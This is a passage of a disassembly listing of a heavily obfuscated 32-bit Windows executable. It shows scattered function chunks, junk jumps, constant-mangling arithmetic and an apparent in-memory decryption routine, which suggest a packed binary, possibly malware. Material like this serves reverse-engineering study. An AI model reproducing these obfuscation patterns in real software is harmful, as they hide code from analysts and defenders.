; ---------------------------------------------------------------------------
loc_42351E: ; DATA XREF: sub_429412+315F�o
mov ebx, [ebx]
add eax, ebx
pop ebx
call sub_42BD51
; START OF FUNCTION CHUNK FOR sub_42DA74
loc_423528: ; CODE XREF: sub_42DA74+13�j
jmp loc_42E221
; END OF FUNCTION CHUNK FOR sub_42DA74
; ---------------------------------------------------------------------------
loc_42352D: ; CODE XREF: _7hdaygc1:00423A2A�j
jmp loc_42FBDB
; ---------------------------------------------------------------------------
loc_423532: ; CODE XREF: _7hdaygc1:0042342E�j
jmp loc_42B12D
; ---------------------------------------------------------------------------
xchg edi, [esp]
mov ecx, edi
pop edi
; START OF FUNCTION CHUNK FOR sub_425F27
loc_42353D: ; CODE XREF: sub_425F27:loc_42EA3F�j
pop ecx
jmp loc_42568C
; END OF FUNCTION CHUNK FOR sub_425F27
; ---------------------------------------------------------------------------
or ebx, 0DF9DA996h
shl esi, 1
jmp sub_425182
; ---------------------------------------------------------------------------
loc_423550: ; CODE XREF: _7hdaygc1:0042B7C8�j
sub ebp, 5D86F6FFh
pop ebp
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_423557: ; CODE XREF: sub_424AE1:loc_42B7BB�j
or eax, 7029D178h
add eax, 0E9E51394h
add eax, ebp
push offset sub_428593
jmp loc_42DB8C
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
jg loc_429E63
jmp sub_429412
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E254
loc_42357A: ; CODE XREF: sub_42E254:loc_427E2C�j
push offset loc_428066
loc_42357F: ; CODE XREF: sub_42DD73:loc_4273F4�j
jmp loc_429059
; END OF FUNCTION CHUNK FOR sub_42E254
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425647
loc_423584: ; CODE XREF: sub_425647:loc_42E5E0�j
call sub_42EA6A
; END OF FUNCTION CHUNK FOR sub_425647
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_185. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F789
loc_42358A: ; CODE XREF: sub_42F789+D�j
jmp loc_425060
; END OF FUNCTION CHUNK FOR sub_42F789
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42358F: ; CODE XREF: sub_42C443+2FEE�j
; _7hdaygc1:0042FBFE�j
jmp loc_424EDA
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F05E
loc_423594: ; CODE XREF: sub_42F05E+11�j
jmp loc_427405
; END OF FUNCTION CHUNK FOR sub_42F05E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EFBC
loc_423599: ; CODE XREF: sub_42EFBC+E�j
jmp loc_42A32E
; END OF FUNCTION CHUNK FOR sub_42EFBC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291A3
loc_42359E: ; CODE XREF: sub_4291A3+1A�j
jmp loc_4265C3
; END OF FUNCTION CHUNK FOR sub_4291A3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42512A
loc_4235A3: ; CODE XREF: sub_42512A+8�j
jmp loc_428391
; END OF FUNCTION CHUNK FOR sub_42512A
; ---------------------------------------------------------------------------
loc_4235A8: ; CODE XREF: _7hdaygc1:0042C487�j
jl loc_42BF22
adc edi, 0D7E7F5C3h
sbb edx, 4DD9B571h
jb loc_425AD6
; START OF FUNCTION CHUNK FOR sub_426130
loc_4235C0: ; CODE XREF: sub_426130:loc_42C46C�j
add edx, 0C14AC2F2h
xchg edx, [esp+0]
jmp sub_428E56
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
loc_4235CE: ; CODE XREF: _7hdaygc1:loc_42FBE7�j
popf
jmp loc_42ACF3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FD11
loc_4235D4: ; CODE XREF: sub_42FD11:loc_425E5F�j
push eax
push 0
push 0
mov eax, [ebp-4]
push eax
loc_4235DD: ; CODE XREF: sub_42809F:loc_42AD9B�j
push 0
push esi
push 59956185h
jmp loc_424CC8
; END OF FUNCTION CHUNK FOR sub_42FD11
; ---------------------------------------------------------------------------
loc_4235EA: ; CODE XREF: _7hdaygc1:0042EE1C�j
or edi, 50DCC5DAh
shr edx, 0Ah
jmp loc_4247CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423812
loc_4235F8: ; CODE XREF: _7hdaygc1:loc_4246D1�j
; sub_423812+18FC�j
jge loc_429FB3
; END OF FUNCTION CHUNK FOR sub_423812
; START OF FUNCTION CHUNK FOR sub_426EBD
loc_4235FE: ; CODE XREF: sub_426EBD+4F39�j
jmp loc_42E466
; END OF FUNCTION CHUNK FOR sub_426EBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4C2
loc_423603: ; CODE XREF: sub_42A4C2+17�j
jmp nullsub_32
; END OF FUNCTION CHUNK FOR sub_42A4C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_423608: ; CODE XREF: sub_42C16F-32DE�j
jmp loc_428A8E
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
sbb edi, 9C069E16h
adc ebp, ecx
jmp loc_429FB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_42361A: ; CODE XREF: sub_423648+673E�j
jz loc_42362D
push ebp
mov eax, [ebp-20h]
call sub_42F7BE
pop ecx
mov [ebp-20h], eax
loc_42362D: ; CODE XREF: sub_423648:loc_42361A�j
; sub_423648+6722�j ...
js loc_423BE3
test byte ptr [ebp-7], 8
jmp loc_42840E
; END OF FUNCTION CHUNK FOR sub_423648
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_18. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425459
loc_42363D: ; CODE XREF: sub_425459+E�j
jmp sub_42828C
; END OF FUNCTION CHUNK FOR sub_425459
; ---------------------------------------------------------------------------
loc_423642: ; CODE XREF: _7hdaygc1:00424865�j
jnp loc_4256FA
; =============== S U B R O U T I N E =======================================
sub_423648 proc near ; CODE XREF: sub_42CFDA:loc_429571�p
; FUNCTION CHUNK AT 0042319F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042361A SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00423BDA SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00423F99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004243D5 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004257CD SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00426E60 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426E7B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00427D73 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004282FD SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042840E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00428B85 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004290B7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00429D66 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042B09C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B23F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042BA1B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042CA45 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042CADC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D10C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042D2E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D637 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0042D7CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EC57 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F13C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042F373 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FA78 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042FB1C SIZE 0000001E BYTES
xchg ecx, [esp+0]
pop ecx
jnz loc_4243DF
loc_423652: ; CODE XREF: sub_423648+D91�j
; sub_423648+9FF3�j
js loc_4257D5
jmp loc_42319F
sub_423648 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A6D
loc_42365D: ; CODE XREF: sub_423A6D:loc_427076�j
pop eax
push offset loc_425072
jmp loc_425119
; END OF FUNCTION CHUNK FOR sub_423A6D
; ---------------------------------------------------------------------------
loc_423668: ; CODE XREF: _7hdaygc1:00423519�j
mov edi, [eax]
shr eax, 6
; START OF FUNCTION CHUNK FOR sub_42EFBC
loc_42366D: ; CODE XREF: sub_42EFBC:loc_42350C�j
sub eax, 8E8F2CD6h
add eax, 0BB46EF06h
add eax, ebp
push edi
jmp loc_428943
; END OF FUNCTION CHUNK FOR sub_42EFBC
; ---------------------------------------------------------------------------
loc_423681: ; CODE XREF: _7hdaygc1:loc_42DAC5�j
push offset loc_42DFFC
jmp locret_42AD8D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_42368B: ; CODE XREF: sub_423172:loc_428D52�j
pop ebx
add ebx, ds:4000F4h
test ebx, 10h
jmp loc_426B80
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
locret_42369D: ; CODE XREF: _7hdaygc1:00426691�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427EF6
loc_42369E: ; CODE XREF: sub_427EF6+6954�j
pop eax
pop esi
pop ecx
pop ebx
xchg edx, [esp-10h+arg_C]
mov ebp, edx
pop edx
retn
; END OF FUNCTION CHUNK FOR sub_427EF6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42874A
loc_4236A9: ; CODE XREF: sub_42874A-3D64�j
jmp loc_42C3B3
; END OF FUNCTION CHUNK FOR sub_42874A
; ---------------------------------------------------------------------------
loc_4236AE: ; CODE XREF: _7hdaygc1:00423982�j
jmp loc_4280FC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_98. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5B
loc_4236B4: ; CODE XREF: sub_428B5B+15�j
jmp loc_4256E0
; END OF FUNCTION CHUNK FOR sub_428B5B
; ---------------------------------------------------------------------------
loc_4236B9: ; CODE XREF: _7hdaygc1:0042572D�j
sbb ecx, 31F28CBCh
mov edx, ebx
js loc_42EF3F
shl eax, 9
jmp loc_42DF98
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425182
loc_4236CF: ; CODE XREF: sub_425182+387C�j
mov al, [ebp-5]
pop ecx
pop ecx
loc_4236D4: ; CODE XREF: _7hdaygc1:00424996�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_425182
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42524F
loc_4236D6: ; CODE XREF: sub_42524F+51F9�j
jmp loc_4273B8
; END OF FUNCTION CHUNK FOR sub_42524F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425182
loc_4236DB: ; CODE XREF: sub_425182+15C7�j
; sub_429532-2CC2�j ...
mov al, 1
jmp loc_4289FB
; END OF FUNCTION CHUNK FOR sub_425182
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429532
loc_4236E2: ; CODE XREF: sub_429532-2CCE�j
; sub_429532+1A�j
inc dword ptr [ebp-4]
jmp loc_42BDD9
; END OF FUNCTION CHUNK FOR sub_429532
; =============== S U B R O U T I N E =======================================
sub_4236EA proc near ; CODE XREF: sub_42ECAF+F�p
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 0042C8C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CA5A SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042F049 SIZE 00000005 BYTES
call sub_4297B2
jmp loc_42C8C1
sub_4236EA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_4236F4: ; CODE XREF: sub_42AFFE-2F2D�j
jbe loc_425125
mov ebp, 18BD1576h
jmp loc_4239E6
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_423704: ; CODE XREF: sub_429318:loc_42F947�j
add eax, ebp
add eax, 0A2FA9EBAh
push edi
pushf
jmp loc_42BD45
; END OF FUNCTION CHUNK FOR sub_429318
; ---------------------------------------------------------------------------
loc_423713: ; DATA XREF: sub_425735+271C�o
or ecx, ecx
jz loc_4243FB
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_4243FB
call sub_42E3A4
jnz loc_4243FB
mov eax, ebx
jmp loc_428F4D
; ---------------------------------------------------------------------------
loc_423739: ; CODE XREF: _7hdaygc1:0042B0A7�j
xchg ebx, ecx
; START OF FUNCTION CHUNK FOR sub_42911B
loc_42373B: ; CODE XREF: sub_42911B:loc_42B096�j
or ebx, ds:4000F2h
and ebx, 0E1A2E734h
add ebx, 0DFC2A681h
jmp loc_42E7BC
; END OF FUNCTION CHUNK FOR sub_42911B
; =============== S U B R O U T I N E =======================================
sub_423752 proc near ; CODE XREF: _7hdaygc1:00426296�j
; sub_42A833:loc_427E5B�p
; FUNCTION CHUNK AT 00423839 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004238DD SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00424B35 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042812C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429440 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00429664 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BA77 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E122 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042E216 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042F1B6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F20B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042F930 SIZE 00000011 BYTES
xchg edi, [esp+0]
pop edi
push edx
push 551C7135h
pop edx
or edx, 8136009Fh
jmp loc_424B35
sub_423752 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
cmp edi, 22EC8634h
jmp loc_423DF6
; ---------------------------------------------------------------------------
not edi
jmp sub_42C7F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD73
loc_42377A: ; CODE XREF: sub_42DD73+11�j
jz loc_42955E
jmp loc_42D3BA
; END OF FUNCTION CHUNK FOR sub_42DD73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B034
loc_423785: ; CODE XREF: sub_42B034:loc_424DAE�j
add ecx, ebp
add ecx, 0BE31CD06h
push offset sub_42BF20
jmp loc_42F9F1
; END OF FUNCTION CHUNK FOR sub_42B034
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B6B5
loc_423797: ; CODE XREF: sub_42B6B5:loc_4238BB�j
pop edi
xor edi, 3EFF4Fh
or edi, 8293FC9h
rol edi, 0Ah
xor edi, 6D2220Ch
jmp loc_4247F9
; END OF FUNCTION CHUNK FOR sub_42B6B5
; ---------------------------------------------------------------------------
cmp ebp, 0B5FA5715h
jmp loc_425F1B
; ---------------------------------------------------------------------------
loc_4237BD: ; DATA XREF: sub_4253A0:loc_4237F0�o
mov eax, [ebp-0Ch]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BEC6
loc_4237C4: ; CODE XREF: sub_42BEC6-7DA1�j
jmp loc_42D3AD
; END OF FUNCTION CHUNK FOR sub_42BEC6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_4237C9: ; CODE XREF: sub_4253A0+E41�j
; sub_42E347+C�j
inc dword ptr [ebp-18h]
dec dword ptr [ebp-1Ch]
jnz loc_42E527
jmp loc_426BEC
; END OF FUNCTION CHUNK FOR sub_4253A0
; =============== S U B R O U T I N E =======================================
sub_4237DA proc near ; CODE XREF: sub_4273CA-20E2�p
; sub_424963+BEB�p ...
; FUNCTION CHUNK AT 0042316D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004284D0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00428B50 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A858 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B7A0 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042D74C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D7FE SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042D91C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042DB94 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042EEBE SIZE 0000000A BYTES
push ebp
jmp loc_42316D
sub_4237DA endp
; ---------------------------------------------------------------------------
loc_4237E0: ; CODE XREF: _7hdaygc1:0042E9EC�j
jnb loc_428F8E
mov esi, ebp
jmp sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429968
loc_4237ED: ; CODE XREF: sub_429968:loc_4246CC�j
mov [ebp-0Ch], eax
; END OF FUNCTION CHUNK FOR sub_429968
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_4237F0: ; CODE XREF: sub_4253A0:loc_4253A8�j
; sub_4253A0:loc_426BEC�j ...
push offset loc_4237BD
jmp nullsub_7
; END OF FUNCTION CHUNK FOR sub_4253A0
; ---------------------------------------------------------------------------
push offset loc_42A3A7
jmp locret_4247F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42821A
loc_423804: ; CODE XREF: sub_42821A+11�j
jnz loc_4254ED
jmp loc_42E1AD
; END OF FUNCTION CHUNK FOR sub_42821A
; ---------------------------------------------------------------------------
loc_42380F: ; CODE XREF: _7hdaygc1:0042333E�j
shr eax, 4
; =============== S U B R O U T I N E =======================================
sub_423812 proc near ; CODE XREF: _7hdaygc1:0042C91A�p
; FUNCTION CHUNK AT 004235F8 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00425102 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00429FB3 SIZE 00000010 BYTES
xchg edi, [esp+0]
pop edi
push 27A2424Bh
pop esi
add esi, 0D15E0475h
xor esi, 0DCBCB459h
jmp loc_425102
sub_423812 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B510
loc_42382D: ; CODE XREF: sub_42B510:loc_42E7B7�j
push esi
push offset sub_4296C2
jmp nullsub_179
; END OF FUNCTION CHUNK FOR sub_42B510
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_97. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423752
loc_423839: ; CODE XREF: sub_423752+C1EA�j
jmp loc_42F20B
; END OF FUNCTION CHUNK FOR sub_423752
; ---------------------------------------------------------------------------
loc_42383E: ; CODE XREF: _7hdaygc1:0042B662�j
jmp loc_423223
; ---------------------------------------------------------------------------
loc_423843: ; CODE XREF: _7hdaygc1:0042C076�j
jz loc_42AC19
cdq
push ecx
jmp loc_42B78A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4270E6
loc_423850: ; CODE XREF: sub_4270E6+8BE2�j
mov eax, offset dword_428388
mov [ebp-4], eax
push esi
push offset loc_42E75B
jmp locret_42EBAD
; END OF FUNCTION CHUNK FOR sub_4270E6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_33. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428613
loc_423864: ; CODE XREF: sub_428613+4BE1�j
add edx, 3E93714Bh
popf
xchg edx, [esp-4+arg_0]
jmp loc_42FBBB
; END OF FUNCTION CHUNK FOR sub_428613
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C50D
loc_423873: ; CODE XREF: sub_42C50D:loc_42C520�j
pop ecx
xchg ecx, [esp-4+arg_0]
mov ebp, esp
push ebx
push ecx
jmp loc_42E771
; END OF FUNCTION CHUNK FOR sub_42C50D
; ---------------------------------------------------------------------------
loc_423880: ; CODE XREF: _7hdaygc1:0042ED6B�j
sub eax, 694BB37Bh
add eax, 45B5A5E7h
add eax, ebp
add eax, 1AF2ED4Fh
push offset loc_42DEE4
jmp locret_423CC6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F9D2
loc_42389E: ; CODE XREF: sub_42F9D2:loc_42F9E0�j
or ecx, ecx
jz loc_427E44
call sub_42E3A4
jnz loc_42BB26
call sub_42D073
; END OF FUNCTION CHUNK FOR sub_42F9D2
; START OF FUNCTION CHUNK FOR sub_42D073
loc_4238B6: ; CODE XREF: sub_42D073+18�j
jmp loc_427E44
; END OF FUNCTION CHUNK FOR sub_42D073
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B6B5
loc_4238BB: ; CODE XREF: sub_42B6B5+B�j
jmp loc_423797
; END OF FUNCTION CHUNK FOR sub_42B6B5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424FE5
loc_4238C0: ; CODE XREF: sub_424FE5+C�j
jmp loc_425F30
; END OF FUNCTION CHUNK FOR sub_424FE5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D48F
loc_4238C5: ; CODE XREF: sub_42D48F:loc_42D05C�j
or edx, 0C2CFF5AFh
and edx, 0C691347Dh
call sub_42DBAE
; END OF FUNCTION CHUNK FOR sub_42D48F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_71. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_4238D7: ; CODE XREF: sub_424AE1+9A8C�j
jmp loc_428E61
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
locret_4238DC: ; CODE XREF: _7hdaygc1:loc_4285D6�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423752
loc_4238DD: ; CODE XREF: sub_423752+13F5�j
; _7hdaygc1:0042FB3F�j
add edx, 0BC0E6138h
xchg edx, [esp+0]
jmp loc_429664
; END OF FUNCTION CHUNK FOR sub_423752
; ---------------------------------------------------------------------------
mov esp, ebp
pop ebp
push eax
mov eax, ecx
jmp loc_427ED8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_4238F6: ; CODE XREF: sub_42AA47:loc_42A78C�j
jge loc_42AF2B
jmp loc_42D619
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
loc_423901: ; CODE XREF: _7hdaygc1:loc_42B79B�j
jl loc_42ECCB
; START OF FUNCTION CHUNK FOR sub_425F27
loc_423907: ; CODE XREF: sub_425F27+7D26�j
jmp loc_429C2F
; END OF FUNCTION CHUNK FOR sub_425F27
; ---------------------------------------------------------------------------
sub esi, ecx
push 52380A1Dh
jmp loc_42ECC8
; ---------------------------------------------------------------------------
not eax
jmp loc_426148
; ---------------------------------------------------------------------------
call sub_42F467
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_423924: ; CODE XREF: sub_4253A0+89B0�j
jmp loc_42DE39
; END OF FUNCTION CHUNK FOR sub_4253A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A39
loc_423929: ; CODE XREF: sub_426A39+4E07�j
jmp loc_42AB52
; END OF FUNCTION CHUNK FOR sub_426A39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB9F
loc_42392E: ; CODE XREF: sub_42AB9F-10EF�j
jmp loc_4230FD
; END OF FUNCTION CHUNK FOR sub_42AB9F
; ---------------------------------------------------------------------------
loc_423933: ; CODE XREF: _7hdaygc1:0042870C�j
pop eax
and eax, 0B1A21758h
sub eax, 404854E4h
add eax, 7B7893B3h
add edx, eax
pop eax
mov [edx], eax
jmp loc_42B9C7
; ---------------------------------------------------------------------------
loc_423950: ; DATA XREF: sub_42D9F8+5�o
mov ebp, esp
loc_423952: ; CODE XREF: _7hdaygc1:00423A02�j
add esp, 0FFFFFFF8h
push offset loc_42DD2C
jmp loc_426971
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B907
loc_42395F: ; CODE XREF: sub_42B907-36CC�j
; sub_42B907:loc_42880D�j
push 6672FC79h
pop eax
sub eax, 0F3F50443h
add eax, 0B7FF8C6Ch
test eax, 1000000h
jmp loc_42DBDB
; END OF FUNCTION CHUNK FOR sub_42B907
; ---------------------------------------------------------------------------
loc_42397C: ; CODE XREF: _7hdaygc1:0042989A�j
jz loc_42656C
jmp loc_4236AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C2C
loc_423987: ; CODE XREF: sub_425C2C+A�j
jnz loc_42B157
jmp loc_426D0B
; END OF FUNCTION CHUNK FOR sub_425C2C
; ---------------------------------------------------------------------------
jo loc_42878F
jmp loc_428077
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_42399D: ; CODE XREF: sub_429318+11�j
cmp dword ptr [ebp-30h], 0
jle loc_426C06
jmp loc_42F053
; END OF FUNCTION CHUNK FOR sub_429318
; ---------------------------------------------------------------------------
loc_4239AC: ; CODE XREF: _7hdaygc1:0042473C�j
jnz loc_428C2C
shr eax, 9
jmp loc_424FF6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_4239BA: ; CODE XREF: sub_42C443-7554�j
; sub_42C443:loc_429BF7�j ...
call sub_42581B
loc_4239BF: ; CODE XREF: _7hdaygc1:00423229�j
jmp loc_42B362
; END OF FUNCTION CHUNK FOR sub_42C443
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_44. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F30D
loc_4239C5: ; CODE XREF: sub_42F30D+6�j
jmp loc_426482
; END OF FUNCTION CHUNK FOR sub_42F30D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F528
loc_4239CA: ; CODE XREF: sub_42F528-A11C�j
jmp sub_42D757
; END OF FUNCTION CHUNK FOR sub_42F528
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425752
loc_4239CF: ; CODE XREF: sub_425752+19�j
push edx
mov edx, ebx
xchg edx, [esp+4+var_4]
mov ebx, eax
xchg ebx, [esp+4+var_4]
push edx
push 13E82EFEh
pop edx
jmp loc_42A04D
; END OF FUNCTION CHUNK FOR sub_425752
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_4239E6: ; CODE XREF: sub_42AFFE-78FF�j
; sub_427D11:loc_42ACE8�j
mov eax, 400h
push ecx
push 38441BDFh
pop ecx
jmp loc_429994
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_4239F7: ; CODE XREF: sub_423172+2B32�j
jge loc_42BC85
loc_4239FD: ; CODE XREF: _7hdaygc1:004252A4�j
jmp loc_4270B8
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
jz loc_423952
jmp loc_42BC82
; ---------------------------------------------------------------------------
loc_423A0D: ; CODE XREF: _7hdaygc1:0042B592�j
mov ebx, [ebx]
cmp eax, ebx
pop ebx
jz loc_4270F0
jmp loc_42B51D
; ---------------------------------------------------------------------------
loc_423A1D: ; DATA XREF: _7hdaygc1:0042682E�o
cmp ds:dword_42BC58, 0
jnz loc_42D2C2
jmp loc_42352D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8DB
loc_423A2F: ; CODE XREF: sub_42F8DB:loc_42DAD4�j
call sub_42ED4E
; END OF FUNCTION CHUNK FOR sub_42F8DB
; =============== S U B R O U T I N E =======================================
sub_423A34 proc near ; CODE XREF: _7hdaygc1:00429238�j
; _7hdaygc1:00429C09�p
xchg ebx, [esp+0]
pop ebx
xor [esi], ebx
add [esi], ecx
jmp loc_42A797
sub_423A34 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425561
loc_423A41: ; CODE XREF: sub_425561+D�j
or esi, 0C599BD5Eh
sub esi, 7CBD6C72h
add esi, 0AF6620BAh
xchg esi, [esp+0]
jmp sub_42B3AD
; END OF FUNCTION CHUNK FOR sub_425561
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_95. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_423A5C: ; CODE XREF: sub_424AE1+70DB�j
push eax
call sub_426CBB
push 4
lea eax, [ebp-28h]
push eax
jmp loc_42933F
; END OF FUNCTION CHUNK FOR sub_424AE1
; =============== S U B R O U T I N E =======================================
sub_423A6D proc near ; DATA XREF: sub_42B01E+C�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042365D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425119 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427076 SIZE 00000005 BYTES
push ebp
mov ebp, eax
